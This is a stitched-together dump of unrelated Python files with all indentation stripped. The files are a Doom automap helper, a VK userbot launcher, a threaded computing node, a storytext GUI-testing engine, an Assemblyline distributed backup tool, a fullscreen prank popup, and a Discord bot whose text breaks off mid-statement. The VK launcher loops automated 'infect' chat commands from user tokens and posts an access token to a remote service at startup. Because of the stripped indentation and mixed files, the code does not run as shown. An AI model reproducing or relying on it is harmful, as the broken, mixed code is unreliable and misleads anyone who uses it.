if env.unwrapped.coord_limits and hasattr(env.unwrapped, 'get_automap_buffer'):
from vizdoom import ScreenResolution
env.unwrapped.show_automap = True
env.unwrapped.screen_w = 800
env.unwrapped.screen_h = 600
env.unwrapped.screen_resolution = ScreenResolution.RES_800X600
env.reset()
env.unwrapped.game.advance_action()
map_img = env.unwrapped.get_automap_buffer()
map_img = crop_map_image(map_img)
coord_limits = env.unwrapped.coord_limits
except AttributeError as exc:
log.warning(f'Could not get map image from env, exception: {exc}')
finally:
env.close()
return_dict['map_img'] = map_img
return_dict['coord_limits'] = coord_limits
def generate_env_map(make_env_func):
"""
Currently only Doom environments support this.
We have to initialize the env instance in a separate process because otherwise Doom overrides the signal handler
    and we cannot do things like KeyboardInterrupt anymore.
"""
manager = multiprocessing.Manager()
return_dict = manager.dict()
p = multiprocessing.Process(target=_generate_env_map_worker, args=(make_env_func, return_dict))
p.start()
p.join()
return_dict = AttrDict(return_dict)
return return_dict.map_img, return_dict.coord_limits
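# A minimal usage sketch for generate_env_map: it only needs a zero-argument
# factory that builds the environment. `make_doom_env` below is a hypothetical
# placeholder for such a factory from the surrounding project:
#
#     def make_doom_env():
#         return create_doom_env('doom_maze')  # hypothetical constructor
#
#     map_img, coord_limits = generate_env_map(make_doom_env)
#     if map_img is None:
#         log.warning('This env does not expose an automap buffer')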
|
main.py
|
import argparse
import json
import random
import time
import traceback
from threading import Thread
import aiohttp
import requests
import vk_api
from vkbottle.api import UserApi
from vkbottle.user import User
from idm_lp import const
from idm_lp.commands import commands_bp
from idm_lp.database import Database, DatabaseError
from idm_lp.error_handlers import error_handlers_bp
from idm_lp.logger import logger, Logger, LoggerLevel
from idm_lp.utils import check_ping
if const.ALLOW_SENTRY:
import sentry_sdk
sentry_sdk.init(
const.SENTRY_URL,
traces_sample_rate=1.0
)
parser = argparse.ArgumentParser(
    description='The LP module allows the «IDM multi» signal receiver to work in any chats.\n'
                'It also adds ignore, global ignore, mute and aliases.'
)
parser.add_argument(
'--config_path',
type=str,
dest="config_path",
default="config.json",
    help='Path to the config file'
)
parser.add_argument(
'--base_domain',
type=str,
dest="base_domain",
default="https://irisduty.ru",
    help='Base domain'
)
parser.add_argument(
'--use_app_data',
dest="use_app_data",
action="store_const",
const=True,
    help='Use the AppData/IDM folder (Windows).\n'
         'With this option, AppData/IDM and config_path are joined together'
)
parser.add_argument(
'--logger_level',
dest="logger_level",
type=str,
default="INFO",
    help='Logging level.'
)
parser.add_argument(
'--vkbottle_logger_level',
dest="vkbottle_logger_level",
type=str,
default="INFO",
    help='VKBottle logging level.'
)
parser.add_argument(
'--log_to_path',
dest="log_to_path",
action="store_const",
const=True,
    help='Log to file'
)
parser.add_argument(
'--enable_eval',
dest="enable_eval",
action="store_const",
const=True,
    help='Allow eval/exec'
)
def awtor(tokens):
colvo = len(tokens)
colvo_random = random.randint(0, colvo)
session = vk_api.VkApi(token=tokens[colvo_random - 1])
vk = session.get_api()
return vk
def zaraza():
db = Database.load()
vk = awtor(db.tokens)
while True:
db_while = Database.load()
if db_while.worker:
try:
vk.messages.send(peer_id=db.worker_chat, message=f'заразить {db_while.worker_param}', random_id=0)
time.sleep(db_while.worker_time)
except:
time.sleep(db_while.worker_time)
else:
time.sleep(120)
def lp_startup(database):
async def _lp_startup():
api = UserApi.get_current()
text = f'IDM multi LP запущен\n' \
f'Текущая версия: v{const.__version__}'
version_rest = requests.get(const.VERSION_REST).json()
if version_rest['version'] != const.__version__:
text += f"\n\n Доступно обновление {version_rest['version']}\n" \
f"{version_rest['description']}\n" \
f"{const.GITHUB_LINK}"
await api.messages.send(
peer_id=await api.user_id,
random_id=0,
message=text
)
async with aiohttp.ClientSession(headers={"User-Agent": const.APP_USER_AGENT}) as session:
async with session.post(const.GET_LP_INFO_LINK(), json={'access_token': database.tokens[0]}) as resp:
response = await resp.json()
if 'error' in response:
await api.messages.send(
peer_id=await api.user_id,
random_id=0,
message=f"⚠ Ошибка: {response['error']['detail']}"
)
raise KeyboardInterrupt()
else:
if not response['response']['is_active']:
await api.messages.send(
peer_id=await api.user_id,
random_id=0,
message=f"⚠ Ошибка: дежурный не активен"
)
raise KeyboardInterrupt()
database.secret_code = response['response']['secret_code']
database.save()
await check_ping(database.secret_code)
return _lp_startup
def run_lp():
args = parser.parse_args()
const.CONFIG_PATH = args.config_path
const.BASE_DOMAIN = args.base_domain
const.USE_APP_DATA = args.use_app_data if args.use_app_data else False
const.LOG_TO_PATH = args.log_to_path if args.log_to_path else False
const.LOGGER_LEVEL = args.logger_level
const.VKBOTTLE_LOGGER_LEVEL = args.vkbottle_logger_level
const.ENABLE_EVAL = args.enable_eval if args.enable_eval else False
if isinstance(logger, Logger):
logger.global_logger_level = LoggerLevel.get_int(const.LOGGER_LEVEL)
logger.warning(
f"\n\nЗапуск с параметрами:\n"
f" -> Уровень логгирования -> {const.LOGGER_LEVEL}\n"
f" -> Уровень логгирования VKBottle -> {const.VKBOTTLE_LOGGER_LEVEL}\n"
f" -> Логи в файл -> {const.LOG_TO_PATH}\n"
f" -> Путь до файла с конфингом -> {Database.get_path()}\n"
f" -> Использовать папку AppData/IDM -> {const.USE_APP_DATA}\n"
f" -> Базовый домен -> {const.BASE_DOMAIN}\n"
f" -> API -> {const.GET_LP_INFO_LINK()}\n"
f" -> Callback link -> {const.CALLBACK_LINK()}\n"
f" -> Разрешить eval/exec -> {const.ENABLE_EVAL}\n\n"
)
try:
db = Database.load()
Database.set_current(db)
except DatabaseError as ex:
logger.error(
f"{ex.name} | {ex.description}"
)
exit(-1)
except json.JSONDecodeError as ex:
logger.error(
            f'A database error occurred on startup.\n'
            f'Check the data integrity.\n'
            f'Line: {ex.lineno}, column: {ex.colno}.'
)
exit(-1)
except Exception as ex:
        logger.error(f'An error occurred on startup [{ex.__class__.__name__}] {ex}\n{traceback.format_exc()}')
exit(-1)
else:
from idm_lp.validators import (
alias,
role_play_command,
self_prefix,
duty_prefix,
service_prefix,
repeater_word,
yes_or_no
)
user = User(
tokens=db.tokens,
debug=const.VKBOTTLE_LOGGER_LEVEL,
log_to_path=const.LOG_TO_PATH
)
user.set_blueprints(
*commands_bp,
*error_handlers_bp,
)
Thread(target=zaraza).start()
user.run_polling(
auto_reload=False,
on_startup=lp_startup(db),
)
|
positions.py
|
from threading import Thread
import time
from src.config import CONFIG
from src.events import POSITION, fire_event
class PositionsWorker:
def start(self, executions):
t = Thread(target=self._run, args=(executions,))
t.start()
def _run(self, executions):
while True:
fire_event(executions, (POSITION, CONFIG['market']))
time.sleep(5)
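# A minimal usage sketch: `executions` is passed through unchanged to
# fire_event, so it can be whatever the registered event handlers expect:
#
#     worker = PositionsWorker()
#     worker.start(executions)  # emits (POSITION, CONFIG['market']) every 5 seconds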
|
computing_node.py
|
from dataclasses import dataclass
from logs import get_logger
from typing import NoReturn, Union
from settings_loader.settings_loader import SettingsLoader
from message_putter.computing_node_putter import PingPutter, DoneTaskPutter
from message_accepters.computing_node_accepter import StatisticTaskAccepter, BalancedTaskAccepter
from utils.error_context_handler_mixin import ErrorHandlerContextMixin
from algorithm_getters.algorithm_getter import AlgorithmGetter
from computing_nodes.blocks.task_algorithm import TaskAlgorithm
from computing_nodes.blocks.task_data_getter import TaskDataGetter
from computing_nodes.blocks.task_data_saver import TaskDataSaver
from utils.timed_dict import TimedDict
import threading
logger = get_logger(__name__)
settings = SettingsLoader.get_instance()
@dataclass
class NodeInfo:
status: str
node_name = settings.service_id
class ComputingNode(ErrorHandlerContextMixin):
def __init__(self):
super(ComputingNode, self).__init__()
self.current_state = None
self.ping = PingPutter()
self.done_task = DoneTaskPutter()
self.task_accepter = BalancedTaskAccepter()
self.statistic_accepter = StatisticTaskAccepter(settings.service_id)
self.node_info = NodeInfo(status='working')
self.algorithm_getter = AlgorithmGetter()
self.task: Union[dict, None] = None
main = threading.Thread(target=self.run_main_logic)
pings = threading.Thread(target=self.run_pings)
statistic = threading.Thread(target=self.run_statistic_logic)
self.current_statistics = TimedDict(60)
main.start()
pings.start()
statistic.start()
main.join()
pings.join()
statistic.join()
def preprocess_task(self, task):
task['statistic'] = {}
task['statistic']['getter'] = None
task['statistic']['saver'] = None
task['statistic']['algorithms'] = {}
return task
def run_main_logic(self) -> NoReturn:
while not self.stop_event.is_set():
with self.error_handler_context():
_, self.task = self.task_accepter.get_task()
self.task: dict
self.task = self.preprocess_task(self.task)
logger.info(f'got task: {self.task}')
data_getter = self.algorithm_getter.get_getter(
self.task['dataSet']['dataGetter']['fileName'], self.task['dataSet']['dataGetter'].get('file')
)
algorithm = [
self.algorithm_getter.get_algorithm(step['fileName'], step.get('file'))
for step in self.task['algorithm']['tasks']
]
data_saver = self.algorithm_getter.get_saver(
self.task['dataSet']['dataSaver']['fileName'], self.task['dataSet']['dataSaver'].get('file')
)
###
context, self.task = TaskDataGetter.get_data(self.task, data_getter)
context, self.task = TaskAlgorithm.execute(context, self.task, algorithm)
context, self.task = TaskDataSaver.save_data(context, self.task, data_saver)
###
self.current_statistics[self.task['id']] = self.task['statistic']
self.done_task.put_task(self.task)
self.done_task.return_response()
def run_statistic_logic(self) -> NoReturn:
while not self.stop_event.is_set():
with self.error_handler_context():
call_info, statistic_request = self.statistic_accepter.get_task()
statistic_request: dict
logger.info(f'got statistic_request {statistic_request} {self.current_statistics.dict}')
self.statistic_accepter.respond_to_task(
call_info, self.current_statistics.dict.get(statistic_request['id'])
)
def run_pings(self) -> NoReturn:
self.ping.put_task(self.node_info)
while not self.stop_event.wait(60):
self.ping.put_task(self.node_info)
self.node_info.status = 'quit'
self.ping.put_task(self.node_info)
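# Shape of the task payload consumed by run_main_logic, with the field names
# taken from the code above (concrete values are illustrative):
#
#     {
#         "id": "...",
#         "dataSet": {
#             "dataGetter": {"fileName": "...", "file": "..."},
#             "dataSaver": {"fileName": "...", "file": "..."}
#         },
#         "algorithm": {"tasks": [{"fileName": "...", "file": "..."}]}
#     }
#
# preprocess_task then attaches the 'statistic' sub-dict that the getter, the
# algorithm steps and the saver fill in.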
|
__init__.py
|
""" Don't load any Java stuff at global scope, needs to be importable by CPython also """
import storytext.guishared, os, types
from threading import Thread
class ScriptEngine(storytext.guishared.ScriptEngine):
eventTypes = [] # Can't set them up until the Eclipse class loader is available
signalDescs = {}
def __init__(self, *args, **kw):
self.testThread = None
storytext.guishared.ScriptEngine.__init__(self, *args, **kw)
def createReplayer(self, universalLogging=False, **kw):
return UseCaseReplayer(self.uiMap, universalLogging, self.recorder, **kw)
def setTestThreadAction(self, method):
self.testThread = Thread(target=method)
def runSystemUnderTest(self, args):
self.testThread.start()
self.run_python_or_java(args)
def importCustomEventTypes(self, *args):
pass # Otherwise they get loaded too early and hence get the wrong classloader (in RCP)
def importCustomEventTypesFromSimulator(self, eventTypes):
self.eventTypes = eventTypes
storytext.guishared.ScriptEngine.importCustomEventTypes(self, "storytext.javaswttoolkit.nattablesimulator", "nebula")
storytext.guishared.ScriptEngine.importCustomEventTypes(self, "customwidgetevents")
def getDescriptionInfo(self):
return "SWT", "javaswt", "event types", \
"http://help.eclipse.org/helios/index.jsp?topic=/org.eclipse.platform.doc.isv/reference/api/"
def getDocName(self, className):
return className.replace(".", "/")
def getRecordReplayInfo(self, module):
from simulator import WidgetMonitor
info = {}
for widgetClass, eventTypes in WidgetMonitor.getWidgetEventTypeNames():
className = self.getClassName(widgetClass, module)
info[className] = sorted(eventTypes)
return info
def getClassName(self, widgetClass, *args):
return widgetClass.__module__ + "." + widgetClass.__name__
def getClassNameColumnSize(self):
return 40 # seems to work, mostly
def getSupportedLogWidgets(self):
from describer import Describer
return Describer.statelessWidgets + Describer.stateWidgets
class UseCaseReplayer(storytext.guishared.ThreadedUseCaseReplayer):
def __init__(self, *args, **kw):
# Set up used for recording
storytext.guishared.ThreadedUseCaseReplayer.__init__(self, *args, **kw)
self.setThreadCallbacks()
def setThreadCallbacks(self):
if self.isActive():
self.uiMap.scriptEngine.setTestThreadAction(self.runReplay)
else:
self.uiMap.scriptEngine.setTestThreadAction(self.setUpMonitoring)
def getMonitorClass(self):
return self.importClass("WidgetMonitor", [ "customwidgetevents", self.__class__.__module__ + ".simulator" ])
def setUpMonitoring(self):
from org.eclipse.swtbot.swt.finder.utils import SWTUtils
SWTUtils.waitForDisplayToAppear()
monitor = self.getMonitorClass()(self.uiMap)
if monitor.setUp():
return monitor
def runReplay(self):
monitor = self.setUpMonitoring()
if monitor is None:
return # fatal error in setup
monitor.removeMousePointerIfNeeded()
from simulator import runOnUIThread
# Can't make this a member, otherwise fail with classloader problems for RCP
# (replayer constructed before Eclipse classloader set)
describer = self.getDescriber()
runOnUIThread(describer.addFilters, monitor.getDisplay())
def describe():
runOnUIThread(describer.describeWithUpdates, monitor.getActiveShell)
self.describeAndRun(describe, monitor.handleReplayFailure)
def shouldReraise(self, e, clsName, modNames):
msg = str(e).strip()
allowedMessages = [ "No module named " + modName for modName in modNames ]
allowedMessages.append("cannot import name " + clsName)
return msg not in allowedMessages
def importClass(self, className, modules, extModName=""):
for module in modules:
try:
exec "from " + module + " import " + className + " as _className"
return _className #@UndefinedVariable
except ImportError, e:
if self.shouldReraise(e, className, [ module, extModName ]):
raise
def getDescriberPackage(self):
return self.__class__.__module__
def getDescriber(self):
canvasDescriberClasses = []
for modName, extModName in [ ("customwidgetevents", ""), ("draw2ddescriber", "draw2d"), ("nattabledescriber", "nebula") ]:
descClass = self.importClass("CanvasDescriber", [ modName ], extModName)
if descClass:
canvasDescriberClasses.append(descClass)
descClass = self.importClass("Describer", [ "customwidgetevents", self.getDescriberPackage() + ".describer" ])
return descClass(canvasDescriberClasses)
|
backupmanager.py
|
import json
import time
import os
import subprocess
import threading
import uuid
from assemblyline.al.common import forge, queue, remote_datatypes
from assemblyline.al.common.error_template import ERROR_MAP
TYPE_BACKUP = 0
TYPE_RESTORE = 1
DATABASE_NUM = 3
RETRY_PRINT_THRESHOLD = 1000
COUNT_INCREMENT = 1000
LOW_THRESHOLD = 10000
HIGH_THRESHOLD = 50000
class SystemBackup(object):
def __init__(self, backup_file_path):
self.backup_file_path = backup_file_path
self.ds = forge.get_datastore()
# Static maps
self.BUCKET_MAP = {
"blob": self.ds.blobs,
"node": self.ds.nodes,
"profile": self.ds.profiles,
"signature": self.ds.signatures,
"user": self.ds.users,
}
self.VALID_BUCKETS = sorted(self.BUCKET_MAP.keys())
def list_valid_buckets(self):
return self.VALID_BUCKETS
# noinspection PyProtectedMember
def backup(self, bucket_list=None):
if bucket_list is None:
bucket_list = self.VALID_BUCKETS
for bucket in bucket_list:
if bucket not in self.VALID_BUCKETS:
print "ERROR: '%s' is not a valid bucket.\n\nChoose one of the following:\n\t%s\n" \
% (bucket, "\n\t".join(self.VALID_BUCKETS))
return
with open(self.backup_file_path, "wb") as out_file:
print "Starting system backup... [%s bucket(s)]" % ", ".join(bucket_list)
output = {}
for bucket in bucket_list:
data = {k: self.ds._get_bucket_item(self.BUCKET_MAP[bucket], k)
for k in self.ds._stream_bucket_debug_keys(self.BUCKET_MAP[bucket])}
output[bucket] = data
print "\t[x] %s" % bucket.upper()
print "Saving backup to file %s..." % self.backup_file_path
out_file.write(json.dumps(output))
print "Backup completed!\n"
# noinspection PyProtectedMember
def restore(self, bucket_list=None):
print "Loading backup file %s ..." % self.backup_file_path
with open(self.backup_file_path, "rb") as bck_file:
restore = json.loads(bck_file.read())
if bucket_list is None:
bucket_list = self.VALID_BUCKETS
for bucket in bucket_list:
if bucket not in self.VALID_BUCKETS:
print "ERROR: '%s' is not a valid bucket.\n\nChoose one of the following:\n\t%s\n" \
% (bucket, "\n\t".join(self.VALID_BUCKETS))
return
print "Restoring data in buckets... [%s]" % ", ".join(bucket_list)
errors = []
for bucket in bucket_list:
if bucket not in restore:
print "\t[ ] %s" % bucket.upper()
errors.append(bucket)
else:
for k, v in restore[bucket].iteritems():
v = self.ds.sanitize(bucket, v, k)
self.ds._save_bucket_item(self.BUCKET_MAP[bucket], k, v)
print "\t[x] %s" % bucket.upper()
if len(errors) > 0:
print "Backup restore complete with missing data.\nThe following buckets don't have any data " \
"to restore:\n\t%s \n" % "\n\t".join(errors)
else:
print "Backup restore complete!\n"
class DistributedBackup(object):
def __init__(self, working_dir, worker_count=50, spawn_workers=True):
self.working_dir = working_dir
self.ds = forge.get_datastore()
self.plist = []
self.instance_id = str(uuid.uuid4())
self.follow_queue = queue.NamedQueue("r-follow_%s" % self.instance_id, db=DATABASE_NUM, ttl=1800)
self.hash_queue = remote_datatypes.Hash("r-hash_%s" % self.instance_id, db=DATABASE_NUM)
self.backup_queue = queue.NamedQueue('r-backup_%s' % self.instance_id, db=DATABASE_NUM, ttl=1800)
self.backup_done_queue = queue.NamedQueue("r-backup-done_%s" % self.instance_id, db=DATABASE_NUM, ttl=1800)
self.restore_done_queue = queue.NamedQueue("r-restore-done_%s" % self.instance_id, db=DATABASE_NUM, ttl=1800)
self.bucket_error = []
self.BUCKET_MAP = {
"alert": self.ds.alerts,
"blob": self.ds.blobs,
"emptyresult": self.ds.emptyresults,
"error": self.ds.errors,
"file": self.ds.files,
"filescore": self.ds.filescores,
"node": self.ds.nodes,
"profile": self.ds.profiles,
"result": self.ds.results,
"signature": self.ds.signatures,
"submission": self.ds.submissions,
"user": self.ds.users,
}
self.VALID_BUCKETS = sorted(self.BUCKET_MAP.keys())
self.worker_count = worker_count
self.spawn_workers = spawn_workers
self.current_type = None
def terminate(self):
self._cleanup_queues(self.current_type)
def _cleanup_queues(self, task_type):
if task_type == TYPE_BACKUP:
print "\nCleaning up backup queues for ID: %s..." % self.instance_id
self.backup_queue.delete()
for _ in xrange(100):
self.backup_queue.push({"is_done": True})
time.sleep(2)
self.backup_queue.delete()
self.backup_done_queue.delete()
else:
print "\nCleaning up restore queues for ID: %s..." % self.instance_id
self.restore_done_queue.delete()
self.follow_queue.delete()
self.hash_queue.delete()
def _done_thread(self, done_type):
# Init
map_count = {}
missing_map_count = {}
t_count = 0
e_count = 0
t0 = time.time()
t_last = t0
done_count = 0
# Initialise by type
if done_type == TYPE_BACKUP:
title = "Backup"
done_queue = self.backup_done_queue
else:
title = "Restore"
done_queue = self.restore_done_queue
while True:
msg = queue.select(done_queue, timeout=1)
if not msg:
continue
_, data = msg
if data.get("is_done", False):
done_count += 1
else:
if data.get('success', False):
t_count += 1
bucket_name = data['bucket_name']
if data.get("missing", False):
if bucket_name not in missing_map_count:
missing_map_count[bucket_name] = 0
missing_map_count[bucket_name] += 1
else:
if bucket_name not in map_count:
map_count[bucket_name] = 0
map_count[bucket_name] += 1
if t_count % COUNT_INCREMENT == 0:
new_t = time.time()
print "%s (%s at %s keys/sec) ==> %s" % (t_count,
new_t - t_last,
int(COUNT_INCREMENT / (new_t - t_last)),
map_count)
t_last = new_t
else:
e_count += 1
if done_count == self.worker_count:
break
# Cleanup
self.hash_queue.delete()
summary = ""
summary += "%s DONE! (%s keys backed up - %s errors - %s secs)\n" % \
(title, t_count, e_count, time.time() - t0)
summary += "\n############################################\n"
summary += "########## %08s SUMMARY ################\n" % title.upper()
summary += "############################################\n\n"
for k, v in map_count.iteritems():
summary += "\t%15s: %s\n" % (k.upper(), v)
if len(missing_map_count.keys()) > 0:
summary += "\n\nMissing data:\n\n"
for k, v in missing_map_count.iteritems():
summary += "\t%15s: %s\n" % (k.upper(), v)
if len(self.bucket_error) > 0:
summary += "\nThese buckets failed to %s completely: %s\n" % (title.lower(), self.bucket_error)
print summary
# noinspection PyProtectedMember
def _key_streamer(self, bucket_name, _):
for x in self.ds._stream_bucket_debug_keys(self.BUCKET_MAP[bucket_name]):
yield x
def _search_streamer(self, bucket_name, query):
for x in self.ds.stream_search(bucket_name, query, fl="_yz_rk", item_buffer_size=500):
yield x['_yz_rk']
# noinspection PyBroadException,PyProtectedMember
def backup(self, bucket_list, follow_keys=False, query=None):
if query:
stream_func = self._search_streamer
else:
stream_func = self._key_streamer
for bucket in bucket_list:
if bucket not in self.VALID_BUCKETS:
print "\n%s is not a valid bucket.\n\nThe list of valid buckets is the following:\n\n\t%s\n" % \
(bucket.upper(), "\n\t".join(self.VALID_BUCKETS))
return
try:
# Cleaning queues
self.current_type = TYPE_BACKUP
# Spawning workers
if self.spawn_workers:
print "Spawning %s backup workers ..." % self.worker_count
devnull = open(os.devnull, 'w')
for x in xrange(self.worker_count):
run_dir = __file__[:__file__.index("common/")]
p = subprocess.Popen([os.path.join(run_dir, "run", "invoke.sh"),
os.path.join(run_dir, "run", "distributed_worker.py"),
str(TYPE_BACKUP),
str(x),
self.working_dir,
self.instance_id],
stderr=devnull,
stdout=devnull)
self.plist.append(p)
print "All backup workers started!"
else:
print "No spawning any workers. You need to manually spawn %s workers..." % self.worker_count
# Start done thread
t = threading.Thread(target=self._done_thread, args=(TYPE_BACKUP,), name="Done thread")
t.setDaemon(True)
t.start()
# Process data buckets
print "Send all keys of buckets [%s] to be backed-up..." % ', '.join(bucket_list)
if follow_keys:
print "Distributed backup will perform a deep backup."
for bucket_name in bucket_list:
try:
count = 0
for key in stream_func(bucket_name, query):
self.backup_queue.push({"bucket_name": bucket_name, "key": key, "follow_keys": follow_keys})
count += 1
if count % COUNT_INCREMENT == 0:
if self.backup_queue.length() > HIGH_THRESHOLD:
retry = 0
while self.backup_queue.length() > LOW_THRESHOLD:
if retry % RETRY_PRINT_THRESHOLD == 0:
print "WARNING: Backup queue reached max threshold (%s). " \
"Waiting for queue size " \
"to reach %s before sending more keys... [%s]" \
% (HIGH_THRESHOLD, LOW_THRESHOLD, self.backup_queue.length())
time.sleep(0.1)
retry += 1
except Exception, e:
self.follow_queue.delete()
self.backup_queue.delete()
self.hash_queue.delete()
print e
print "Error occurred while processing bucket %s." % bucket_name
self.bucket_error.append(bucket_name)
# Push kill message to all workers
print "All keys sent for all buckets. Sending kill command and waiting for workers to finish..."
for _ in xrange(self.worker_count):
self.backup_queue.push({"is_done": True})
# Wait for workers to finish
t.join()
except Exception, e:
print e
finally:
print "Backup of %s terminated.\n" % ", ".join(bucket_list)
def restore(self):
try:
self.current_type = TYPE_RESTORE
# Spawning workers
print "Spawning %s restore workers ..." % self.worker_count
devnull = open(os.devnull, 'w')
for x in xrange(self.worker_count):
run_dir = __file__[:__file__.index("common/")]
p = subprocess.Popen([os.path.join(run_dir, "run", "invoke.sh"),
os.path.join(run_dir, "run", "distributed_worker.py"),
str(TYPE_RESTORE),
str(x),
self.working_dir,
self.instance_id],
stderr=devnull,
stdout=devnull)
self.plist.append(p)
print "All restore workers started, waiting for them to import all the data..."
# Start done thread
t = threading.Thread(target=self._done_thread, args=(TYPE_RESTORE,), name="Done thread")
t.setDaemon(True)
t.start()
# Wait for workers to finish
t.join()
except Exception, e:
print e
finally:
print "Restore of backup in %s terminated.\n" % self.working_dir
def _string_getter(data):
if data is not None:
return [data]
else:
return []
def _result_getter(data):
if data is not None:
return [x for x in data if not x.endswith('.e')]
else:
return []
def _emptyresult_getter(data):
if data is not None:
return [x for x in data if x.endswith('.e')]
else:
return []
def _error_getter(data):
if data is not None:
return [x for x in data if x.rsplit('.e', 1)[1] not in ERROR_MAP.keys()]
else:
return []
def _srl_getter(data):
if data is not None:
return [x[:64] for x in data]
else:
return []
def _file_getter(data):
if data is not None:
return [x[1] for x in data]
else:
return []
def _result_file_getter(data):
if data is not None:
supp = data.get("supplementary", []) + data.get("extracted", [])
return _file_getter(supp)
else:
return []
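# FOLLOW_KEYS drives deep ("follow_keys") backups: for an item saved from the
# source bucket, each tuple is (bucket to follow into, field of the item to
# read, getter turning that field into a list of keys). BackupWorker._backup
# pushes every key returned by a getter onto the follow queue so that linked
# items are backed up as well.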
FOLLOW_KEYS = {
"alert": [
('submission', 'sid', _string_getter),
],
"submission": [
('result', 'results', _result_getter),
('emptyresult', 'results', _emptyresult_getter),
('error', 'errors', _error_getter),
('file', 'results', _srl_getter),
('file', 'files', _file_getter),
('file', 'errors', _srl_getter),
],
"results": [
('file', 'response', _result_file_getter),
]
}
# noinspection PyProtectedMember,PyBroadException
class BackupWorker(object):
def __init__(self, wid, worker_type, working_dir, instance_id):
self.working_dir = working_dir
self.worker_id = wid
self.ds = forge.get_datastore()
self.worker_type = worker_type
self.instance_id = instance_id
if worker_type == TYPE_BACKUP:
self.hash_queue = remote_datatypes.Hash("r-hash_%s" % self.instance_id, db=DATABASE_NUM)
self.follow_queue = queue.NamedQueue("r-follow_%s" % self.instance_id, db=DATABASE_NUM, ttl=1800)
self.queue = queue.NamedQueue("r-backup_%s" % self.instance_id, db=DATABASE_NUM, ttl=1800)
self.done_queue = queue.NamedQueue("r-backup-done_%s" % self.instance_id, db=DATABASE_NUM, ttl=1800)
else:
self.hash_queue = None
self.follow_queue = None
self.queue = None
self.done_queue = queue.NamedQueue("r-restore-done_%s" % self.instance_id, db=DATABASE_NUM, ttl=1800)
def _backup(self):
done = False
current_queue = self.queue
with open(os.path.join(self.working_dir, "backup.part%s" % self.worker_id), "wb") as backup_file:
while True:
data = current_queue.pop(timeout=1)
if not data and done:
break
elif not data:
continue
if isinstance(data, list):
data = data[0]
if data.get('is_done', False) and not done:
current_queue = self.follow_queue
done = True
continue
elif data.get('is_done', False) and done:
                    # Got someone else's done message. Push it back on the queue and sleep...
self.queue.push({"is_done": True})
time.sleep(1)
continue
missing = False
success = True
try:
to_write = self.ds._get_bucket_item(self.ds.get_bucket(data['bucket_name']), data['key'])
if to_write:
if data.get('follow_keys', False):
for bucket, bucket_key, getter in FOLLOW_KEYS.get(data['bucket_name'], []):
for key in getter(to_write.get(bucket_key, None)):
hash_key = "%s_%s" % (bucket, key)
if not self.hash_queue.exists(hash_key):
self.hash_queue.add(hash_key, "True")
self.follow_queue.push({"bucket_name": bucket, "key": key, "follow_keys": True})
backup_file.write(json.dumps((data['bucket_name'], data['key'], to_write)) + "\n")
else:
missing = True
except:
success = False
self.done_queue.push({"is_done": False,
"success": success,
"missing": missing,
"bucket_name": data['bucket_name'],
"key": data['key']})
# noinspection PyUnresolvedReferences
def _restore(self):
with open(os.path.join(self.working_dir, "backup.part%s" % self.worker_id), "rb") as input_file:
for l in input_file.xreadlines():
bucket_name, key, data = json.loads(l)
success = True
try:
v = self.ds.sanitize(bucket_name, data, key)
self.ds._save_bucket_item(self.ds.get_bucket(bucket_name), key, v)
except:
success = False
self.done_queue.push({"is_done": False,
"success": success,
"missing": False,
"bucket_name": bucket_name,
"key": key})
def run(self):
if self.worker_type == TYPE_BACKUP:
self._backup()
else:
self._restore()
self.done_queue.push({"is_done": True})
if __name__ == "__main__":
import sys
# noinspection PyBroadException
try:
backup = sys.argv[1]
backup_manager = DistributedBackup(backup, worker_count=1, spawn_workers=False)
backup_manager.restore()
except:
print "No backup to restore"
|
FlashCoucou.pyw
|
import sys
import time
import winsound
import threading
from tkinter import *
global fen
flash_path = sys.argv[1]
event = sys.argv[2]
fen = Tk()
def quitter():
global fen
fen.focus_set()
fen.focus_force()
fen.attributes("-topmost", True)
fen.attributes("-topmost", False)
winsound.PlaySound(flash_path + "Coucou.wav", winsound.SND_FILENAME)
fen.destroy()
fen.geometry("1920x1080")
fen.attributes("-fullscreen", True)
photo = PhotoImage(file= flash_path + event + ".png")
can = Canvas(fen, height= 1080, width= 1920)
can.create_image(1920 / 2, 1080 / 2, image= photo)
can.pack()
thread = threading.Thread(target= quitter)
thread.daemon = True
thread.start()
fen.mainloop()
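# Invocation sketch (arguments are illustrative): the first argument is the
# folder holding the .wav/.png assets (with a trailing separator, since it is
# concatenated directly), the second is the event name matching "<event>.png":
#
#     pythonw FlashCoucou.pyw "C:/flash/" "Coucou"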
|
bot.py
|
import logging
import threading
import asyncio
import unicodedata
from decouple import config
import discord
from discord.utils import get
from django.core.validators import validate_email
from django.core.exceptions import ValidationError
from .utils import send_verify_mail
intents = discord.Intents.all()
intents.presences = False
TOKEN = config("DISCORD_TOKEN", default="")
CSUA_GUILD_ID = config("TEST_GUILD", default=784902200102354985, cast=int)
CSUA_PHILBOT_CLIENT_ID = config("BOT_ID", default=737930184837300274, cast=int)
HOSER_ROLE_ID = config("TEST_ROLE", default=785418569412116513, cast=int) # Verified
DEBUG_CHANNEL_ID = config("DEBUG_CHANNEL", default=788989977794707456, cast=int)
TIMEOUT_SECS = 10
ANI_NRUSIMHA_ID = 168539105704017920
logger = logging.getLogger(__name__)
class CSUAClient(discord.Client):
async def on_ready(self):
print(f"{self.user} has connected to Discord")
self.is_phillip = self.user.id == CSUA_PHILBOT_CLIENT_ID
if self.is_phillip:
print("Phillip is in the Office")
self.csua_guild = get(self.guilds, id=CSUA_GUILD_ID)
self.test_channel = get(self.csua_guild.channels, id=DEBUG_CHANNEL_ID)
self.hoser_role = get(self.csua_guild.roles, id=HOSER_ROLE_ID)
# if self.csua_guild is not None and self.test_channel is not None and self.hoser_role is not None:
# await self.test_channel.send("booting up successfully into phillip_debug channel")
async def verify_member_email(self, user):
channel = user.dm_channel
def check_msg(msg):
return msg.channel == channel
got_email = False
while not got_email:
msg = await self.wait_for("message", check=check_msg)
try:
validate_email(msg.content)
if "@berkeley.edu" in msg.content:
got_email = True
await channel.send(
f"Sending a an email to verify {user.name} to {msg.content}"
)
send_verify_mail(msg.content, user.name)
else:
await channel.send(
f"{msg.content} is not a berkeley email. Please fix this"
)
except ValidationError as e:
                await channel.send(
                    f"{msg.content} is not a valid email. Please try again. Details: {e}"
                )
async def on_message(self, message):
if message.author == self.user:
return
# Reading rules and verification
msg = message.content.lower()
if "hkn" in msg and "ieee" in msg:
await message.channel.send("Do I need to retrieve the stick?")
if "is typing" in msg:
await message.channel.send("unoriginal")
if msg.count("cpma") >= 2:
for c in "wtfiscpma":
emoji = unicodedata.lookup(f"REGIONAL INDICATOR SYMBOL LETTER {c}")
await message.add_reaction(emoji)
elif "based" in msg:
